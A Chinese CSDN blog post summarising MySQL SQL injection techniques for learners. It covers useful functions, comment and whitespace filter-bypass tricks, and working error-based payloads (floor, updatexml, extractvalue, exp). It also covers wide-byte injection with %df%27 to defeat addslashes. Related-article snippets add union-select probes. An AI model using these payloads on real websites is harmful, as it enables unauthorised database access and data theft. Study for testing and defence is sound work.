mysql 4.0注入_史上最水的MYSQL注入总结

最新推荐文章于 2021-02-11 11:01:54 发布
最新推荐文章于 2021-02-11 11:01:54 发布
阅读量248 收藏
点赞数
文章标签: mysql 4.0注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39548787/article/details/113204288
版权

[TOC]

0x1 Forward

​ 这篇文章的雏形我是发在了t00ls,后来我想了下还有其他挺有意思的内容还没总结进来,于是就有了一篇升级版(ps水货本质还是没变),希望有需要的师傅可以阅读看看。

0x2 MySQL 基础知识

1.字符串截取函数

left(str,index) //从左边第index开始截取

right(str,index) //从右边第index开始截取

substring(str,index) //从左边index开始截取

substr(str,index,len) //截取str,index开始,截取len的长度

mid(str,index,ken) //截取str 从index开始,截取len的长度

2.字符串比较

strcmp(expr1,expr2) //如果两个字符串是一样则返回0,如果第一个小于第二个则返回-1

find_in_set(str,strlist) //如果相同则返回1不同则返回0

3.字符串连接函数

concat(str1,str2) //将字符串首尾相连

concat_ws(separator,str1,str2) //将字符串用指定连接符连接

group_concat()//

4.一些绕过注入的罕见函数

instr(str1,substr) //从子字符串中返回子串第一次出现的位置

lpad(str,len,padstr) rpad(str,len,padstr) // 在str的左(右)两边填充给定的padstr到指定的长度len,返回填充的结果

5.运算符

0x5.1算术运算符:

+ - * /

0x5.2比较运算符:

= <> != > <

(1)between //select database() between 0x61 and 0x7a; //select database() between 'a' and 'z';

(2)in //select '123' in ('12') => 0

(3)like(模糊匹配) //select '12345' like '12%' => true

(4)regexp 或 rlike(正则匹配)//select '123455' regexp '^12' => true

0x5.3 逻辑运算符:

not或! 非

AND 逻辑与 == &&

OR 逻辑或 == ||

XOR 逻辑异或 == ^

0x5.4位运算符:

& 按位与

| 按位或

^ 按位异或

! 取反

<< 左移

>>右移

0x5.6.注释符

# //单行注释符,url记得编码为%23

/**/

--+

6.常用函数

0x6.1 延时函数

sleep()

benchmark(1000000,sha(1))

0x6.2 编码函数

hex() ascii()

0x6.3 文件函数

1.load_file //读取文件

2.outfile //写入文件

7.一些构造语句的知识

0x7.1 条件语句

if(expr1,expr2,expr3) // expr1 true执行expr2否则执行expr3

select case when (条件) then 代码1 else 代码 2 end

0x7.2 information_schema 结构

information_schema.tables:

查询表名:table_name 对应的数据库名: table_schema

information_schema.columns:

查询列名:column_name 对应的表名:table_schemamysql盲注语句一般形式

查询结果 + 比较运算符 + 猜测值

0x7.3mysql 报错注入

构造报错语句 + 查询结果

0x7.4 mysql 联合注入

构造联合语句 + 查询结果

0x7.5 mysql 盲注

查询结果 + 比较运算符 + 猜测值

0x7.6 mysql空白字符

%20 %09 %0a %0b %0c %0d %a0 /**/ tab

%a0 这个不会被php的\s进行匹配

/*!*/ 内敛注释

# 这个也可以用来做分隔 挺有意思

0x7.7 some tips

0x7.6.1函数名和括号直接可以插入特殊字符 ex

concat/**/()

information_schema/**/./**/TABLES

information_schema%0a.%0aTABLES

0x7.6.2 {identifier expr}

​ select {x 1} from {x test} limit 1;

0x3 浅谈MYSQL报错注入(略)

常见payload如下:

1.floor()

and (select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)

2.updatexml() //5.1.5

and 1=(updatexml(1,concat(0x3a,(select user())),1))

3.extractvalue() //5.1.5

and extractvalue(1,concat(0x5c,(select user())))

4.exp() //5.5.5版本之后可以使用

select host from user where user = 'root' and Exp(~(select * from (select version())a));

5.name_const //支持老版本

select * from (select NAME_CONST(version(),0),NAME_CONST(version(),0))x;

6.geometrycollection(),multipoint(),polygon(),multipolygon(),linestring(),multilinestring() 几何函数报错

select multipoint((select * from (select * from (select * from (select version())a)b)c));

0x4 浅谈宽字节注入

原理介绍: 【PHP代码审计】入门之路——第二篇-宽字节注入

(1)MYSQL client链接编码的锅

查看编码:show variables like '%character%'

当客户端连接编码设置为GBK的时候 与php进行交互的时候就会出现字符转换 导致单引号逃逸的问题。

测试payload: index.php?id=%df%27

流程: %df%27->addslashes()->%df%5c%27->数据库交互gbk编码->運'

(2)MYSQL iconv函数 mb_convert_encoding函数的锅

借用先知: $id =iconv('GBK','UTF-8', $id)

%df%27===(addslashes)===>%df%5c%27===(iconv)===>%e5%5c%5c%27

其实就是 utf8 -> gbk ->utf-8 低位的%5c 也就是反斜杠干掉了转义单引号的反斜杠。

(3)Big5编码导致的宽字节注入

之前有幸在ddctf 2017被虐过一次,当时就对这个点进行了一些小研究,比如编码的过程 由于当时啥也不懂,搞得有点奇怪,这里就记录一下

weixin_39548787
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql 4 注入_MySQL 注入学习
weixin_36383467的博客
01-27 154
系统学习MySQL注入,记下笔记。字符串相关函数用法left(a,b)从左侧截取a的前b位substr(a,b,c)从b位置开始,截取字符串a的c长度mid(a,b,c)同substrascii()将某个字符转换为ascii值ord()同ascii数学相关函数名用法exp(x)此函数返回e(自然对数的底)到X次方的值懒,用到什么查什么吧。符号特殊符号12345678''""(){}\``%注释符号...
mysql函数之截取字符串
CHCH998的博客
12-16 254
本文转载自:https://www.cnblogs.com/shuaiandjun/p/7197450.html 作者:shuaiandjun 转载请注明该声明。文章摘取自http://www.cnblogs.com/zdz8207/p/3765073.html 练习截取函数之截取字符串.html' target='_self'>字符串函数(五个) mysql索引从1开始 一、mys...
mysql 4 注入_access和mysql4注入小技巧
weixin_42578963的博客
01-20 129
技巧使用时间:知道“表名”但是猜不到“列名”的时候前几天看了文章:http://www.91ri.org/11120.html,这里提到了access的注入小技巧,如果看懂了~大家就忽略前半篇吧~~然后今天想想,mysql4是没有information_schema的,也就是说表名和列名和access一样,要靠猜,那么~~这个技巧或许可以用上ACCESS篇:不知道大家还记得http://sb.f4...
MySql(四)SQL注入
爱是与世界平行
03-06 733
MySql(四)SQL注入一、SQL注入简介二、应用开发中可以采取的应对措施2.1 PrepartStatement+Bind-Variable2.2 使用应用程序提供的转换函数2.3 自定义函数进行校验 一、SQL注入简介 结构化查询语言( SQL)是一种用来和数据库交互的文本语言。SQL注入( SQL Injection )就是利用某些数据库的外部接口将用户数据插入到实际的数据库操作语言(SQ...
access和mysql4注入小技巧
weixin_30809173的博客
11-09 106
技巧使用时间:知道“表名”但是猜不到“列名”的时候 前几天看了文章:http://www.91ri.org/11120.html,这里提到了access的注入小技巧,如果看懂了~大家就忽略前半篇吧~~ 然后今天想想,mysql4是没有information_schema的,也就是说表名和列名和access一样,要靠猜,那么~~这个技巧或许可以用上 ACCESS篇: 不知道大家还记得...
PHP+MYSQL 注入靶场
最新发布
04-26
SQL注入通常针对的是数据库的查询操作,因此了解MySQL的语法和特性对于识别和利用潜在的注入点至关重要。例如,了解如何使用`UNION SELECT`、`LIKE`、`OR`等操作符构造恶意查询,或者如何通过`LIMIT`和`ORDER BY`来...
MySQL注入攻击与防御
02-25
like,mod(),...)字符串的猜解操作(mid(),left(),rpad(),…)字符串生成操作(0x61,hex(),conv()(使用conv([10-36],10,36)可以实现所有字符的表示))可以用以下语句对一个可能的注入点进行测试以下是Mysql中可以用到的...
php mysql_real_escape_string addslashes及mysql绑定参数防SQL注入攻击
10-20
主要介绍了php mysql_real_escape_string addslashes及mysql绑定参数防SQL注入攻击的相关资料,需要的朋友可以参考下
MySQL注入绕开过滤的技巧总结
09-09
MySQL注入是一种常见的安全漏洞,攻击者可以通过输入恶意的SQL语句来操纵数据库,获取敏感信息或执行非授权的操作。当系统有防止SQL注入的过滤机制时,攻击者需要采用一些技巧来绕过这些过滤。以下是一些常见的MySQL...
MySQL 4.0 升级到mysql 5.0的方法
01-21
一、从 4.0 到 4.1 的主要变化 如果在4.1.0到4.1.3版本的MySQL中创建了包含 TIMESTAMP 字段的 InnoDB表。则在升级到4.1.4及更高时需要重建表,因为存储格式发生变化了 字符串根据标准SQL来比较:比较之前不删除末尾...
mysql.data.dll v4.0
02-20
mysql.data.dll v4.0 亲测 可用!!!
druidParser_常用的SQLExpr有哪些
maqingbin8888的专栏
03-20 4610
package com.alibaba.druid.sql.ast; interface SQLObject {} interface SQLExpr extends SQLObject {} interface SQLStatement extends SQLObject {} interface SQLTableSource extends SQLObject {} class SQLS...
LLVM学习日志4——Kaleidoscope:词法分析器和语法分析器
tristan_tian的博客
08-13 5075
要实现一门语言,第一要务就是要能够处理文本文件,搞明白其中究竟写了些什么。传统上,我们会先利用“词法分析器”(也称为“扫描器”)将输入切成“语元(token)”,然后再做处理。词法分析器返回的每个语元都带有一个语元编号,此外可能还会附带一些元数据(比如某个数值)。 看了词法分析器的教程,第一章大概就是讲了如何用语元(token)来表示每个词,使用函数不断读取每个词,并且判断和分类。 词法分析器...
mysql注入函数
qq_39654116的博客
01-04 349
系统信息函数 函数 说明 USER() 获取当前操作句柄的用户名,同SESSION_USER()、CURRENT_USER(),有时也用SYSTEM_USER()。 DATABASE() 获取当前选择的数据库名,同SCHEMA()。 VERSION() 获取当前版本信息。 常见全局变量 变量 说明 @@VERSION 返回版本信息 @@HOSTNAME 返回安装的计算机名称 @@GLOBAL.VERSION 同@@VERSION @@BASEDIR 返
mysql 4.0手工注入_手工注入——MySQL手工注入实战和分析
weixin_39861920的博客
01-27 182
前言今天进行了MySQL手工注入实战,分享一下自己的实战过程和总结,这里环境使用的是墨者学院的在线靶场。话不多说,咱们直接开始。判断注入点通过 ' 和构造 and 1=1 和 and 1=2 查看页面是否报错。这里通过and 1=1 发现页面正常。如下图。接下来,咱们再构造 and 1=2 发现页面报错,说明页面存在注入点。如下图。判断字段数通过 order by 语句,如果后面输入的数字大于数据...
SQL注入 mysql4.0版本_SQL注入(上)
weixin_31884143的博客
02-11 383
查相关内容(一定要在回显点处查看!)查数据库名http://120.203.13.75:6815/index.php?id=1 and 1=2 union select 1,database()查数据库版本(mysql>5.0,5.0 以后的版本才有information_schema, information_schema存储着数据库名、表名、列的数据类型、访问权限等)http://120...
4.0.13 mysql 注入_SQL注入MYSQL
weixin_39828859的博客
01-26 139
SQL注入MYSQL总体上先判断是否有注入点(数字型还是字符型)⽅法⼀:单引号法 '⽅法⼆:逻辑法 and 1=1 and 1=2 1' and '1'='1 1' and '1'='2⽅法三:运算法 -1联合查询条件:前提是前后查询必须拥有相同数量的列,列也必需拥有相同的数据类型版本>4.0当MySQL版本⼤于 5.0时,有个默认数据库information_schema获取当前...
史上最完整的MySQL注入
热门推荐
xiaoi123的博客
09-07 1万+
作者:Passerby2 原文来自:史上最完整的MySQL注入 免责声明:本教程仅用于教育目的,以保护您自己的SQL注释代码。 在阅读本教程后,您必须对任何行动承担全部责任。 0x00 ~ 背景 这篇文章题目为“为新手完成MySQL注入”,它旨在提供专门针对MySQL数据库的SQL注入的完整知识和工作方式,除了堆栈查询部分。 这里的第一个贡献...... 表中的内容 介绍 ...
01-MySQL_C_API-编程实践.docx
03-06
综上所述,这份文档通过介绍了 MySQL C API 的基本用法以及实战应用的内容,帮助读者轻松入门并掌握了 MySQL C API 的编程实践。通过一步步的实例讲解和代码演示,读者可以清晰地了解 MySQL C API 的基本原理和操作...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值